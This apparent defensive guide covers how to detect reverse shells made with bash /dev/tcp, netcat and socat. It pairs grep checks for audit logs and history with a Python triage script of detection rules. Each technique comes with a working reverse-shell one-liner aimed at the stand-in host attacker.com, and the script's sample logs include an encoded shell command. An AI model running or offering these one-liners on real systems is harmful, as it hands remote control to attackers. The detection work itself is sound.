Reverse Shell

Reverse Shell Detection and Analysis

Reverse shells are a common tool in an attacker’s arsenal, enabling remote command execution on compromised systems. This guide explores methods used to establish reverse shells, detection strategies, and forensic analysis techniques.


Common Commands and Their Usage

1. bash Command

The bash command can establish reverse shells by leveraging /dev/tcp or /dev/udp.

Example:

export RHOST=attacker.com
export RPORT=12345
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'

Detection:

  • Audit Logs:

    grep "bash" /var/log/audit/audit.log | grep -E "udp|tcp"
  • Command History:

    history | grep "bash" | grep -E "udp|tcp"
    grep "bash" ~/.bash_history | grep -E "udp|tcp"
  • EDR/XDR Logs: Monitor for bash process creation or network events involving /dev/tcp or /dev/udp.

2. nc (Netcat) Command

Netcat is a versatile utility often used for reverse shells.

Example:

RHOST=attacker.com
RPORT=12345
nc -e /bin/sh $RHOST $RPORT

Detection:

  • Focus on -e or -l parameters.

  • Audit Logs:

    grep "nc" /var/log/audit/audit.log | grep -- "-e"
  • Command History:

    history | grep "nc" | grep -- "-e"
    grep "nc" ~/.bash_history | grep -- "-e"
  • EDR/XDR Logs: Monitor nc process creation and check for unusual outbound connections.

3. socat Command

socat offers more flexibility than nc, making it a preferred choice for advanced reverse shells.

Example:

RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane

Detection:

  • Investigate commands using exec and tcp-connect.

  • Audit Logs:

    grep "socat" /var/log/audit/audit.log | grep -i "exec"
  • Command History:

    history | grep "socat" | grep -i "exec"
    grep "socat" ~/.bash_history | grep -i "exec"
  • EDR/XDR Logs: Analyze socat processes for suspicious parameters and unexpected network activity.


General Detection Strategies

1. Audit Logs

Continuously monitor /var/log/audit/audit.log for specific commands and associated parameters:

  • Commands to Track: bash, nc, socat

  • Example:

    grep [command] /var/log/audit/audit.log

2. Command History

Regularly inspect command history files for traces of suspicious commands. Bear in mind that bash writes .bash_history only when the shell exits and that history can be disabled by the user, so an empty history is weak evidence that nothing ran:

  • Interactive Sessions:

    history | grep [command]
  • Persistent Logs:

    grep [command] ~/.bash_history
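The per-command greps above and the general audit-log and history inspection can be folded into one small triage script. The following is an added example, not code from the original page: it reconstructs the command line from auditd EXECVE records (auditd hex-encodes arguments that contain spaces, which the one-liners above miss), applies one rule per technique, and pulls out the callback host:port so the hit can be pivoted into network telemetry. The log lines are constructed samples with a documentation-range address.

```python
import re

# Constructed sample input (not real telemetry): auditd EXECVE records and .bash_history
# lines for the three techniques above, plus benign commands that must not alert.
SAMPLE_LINES = [
    'type=EXECVE msg=audit(1700000000.101:201): argc=3 a0="bash" a1="-c" a2=657865632062617368202D6920263E2F6465762F7463702F3139382E35312E3130302E372F3132333435203C2631',
    'type=EXECVE msg=audit(1700000000.102:202): argc=5 a0="nc" a1="-e" a2="/bin/sh" a3="198.51.100.7" a4="4444"',
    'socat tcp-connect:198.51.100.7:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane',
    'type=EXECVE msg=audit(1700000000.104:204): argc=4 a0="nc" a1="-zv" a2="localhost" a3="22"',
    'bash -c "echo hello"',
    'socat -V',
]
# One rule per technique; nc's -e/-l may sit inside a flag group such as -lvp, and
# socat's tcp-connect: and exec: addresses may appear in either order.
RULES = [
    ("bash_devtcp", re.compile(r'\b(?:ba)?sh\b.*/dev/(?:tcp|udp)/')),
    ("nc_exec_or_listen", re.compile(r'\bnc\b.*(?<![\w-])-[a-zA-Z]*[el]')),
    ("socat_exec_connect", re.compile(r'\bsocat\b(?=.*\btcp-connect:)(?=.*\bexec:)')),
]
ARG_RE = re.compile(r'\ba\d+=(?:"((?:[^"\\]|\\.)*)"|([0-9A-Fa-f]+))')  # a0="..." or a2=<hex>
REMOTE_RES = [
    re.compile(r'/dev/(?:tcp|udp)/([^/\s"\']+)/(\d+)'),
    re.compile(r'tcp-connect:([^:\s,"\']+):(\d+)'),
]

def command_line(line):
    """Rebuild argv from an EXECVE record (hex-encoded args decoded); other lines pass through."""
    if 'type=EXECVE' not in line:
        return line
    return ' '.join(q or bytes.fromhex(h).decode('utf-8', 'replace') for q, h in ARG_RE.findall(line))

def matched_rules(cmd):
    return [name for name, rx in RULES if rx.search(cmd)]

def remote_endpoint(cmd):
    """Best-effort host:port of the callback, for pivoting into network logs."""
    for rx in REMOTE_RES:
        m = rx.search(cmd)
        if m:
            return f"{m.group(1)}:{m.group(2)}"
    argv = cmd.split()
    if argv and argv[0] == 'nc':  # nc takes host and port as its last two positionals
        positional = [a for a in argv[1:] if not a.startswith(('-', '/'))]
        if len(positional) >= 2:
            return f"{positional[-2]}:{positional[-1]}"
    return None

def scan(lines):
    """Return (command, rules, remote) for every line that trips at least one rule."""
    return [(c, matched_rules(c), remote_endpoint(c)) for c in map(command_line, lines) if matched_rules(c)]
```

Feed it `grep EXECVE /var/log/audit/audit.log` or a copied .bash_history; the `-zv` port check and `socat -V` stay silent, which is the point of matching on the specific parameters rather than on the binary name alone.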

3. EDR/XDR Solutions

Employ EDR or XDR tools to:

  • Track Process Creation: Identify the origin of reverse shell tools.

  • Analyze Network Activity: Monitor outbound connections, especially to uncommon ports or suspicious IP addresses.

4. Network Monitoring

Set up alerts for:

  • Unusual Outbound Connections: Look for high-frequency requests to external IPs.

  • Known Malicious Indicators: Monitor outbound traffic to flagged domains or IPs.


Key Takeaways

  • Reverse shells exploit legitimate utilities like bash, nc, and socat for remote control.

  • Detection relies on monitoring suspicious process creation, command execution, and network connections.

  • Forensic Analysis requires correlating data from:

    • Audit logs (/var/log/audit/audit.log).

    • Command histories (history or .bash_history).

    • EDR/XDR telemetry for process and network activity.

By continuously monitoring system activity and analyzing logs for anomalies, defenders can effectively detect and respond to reverse shell threats.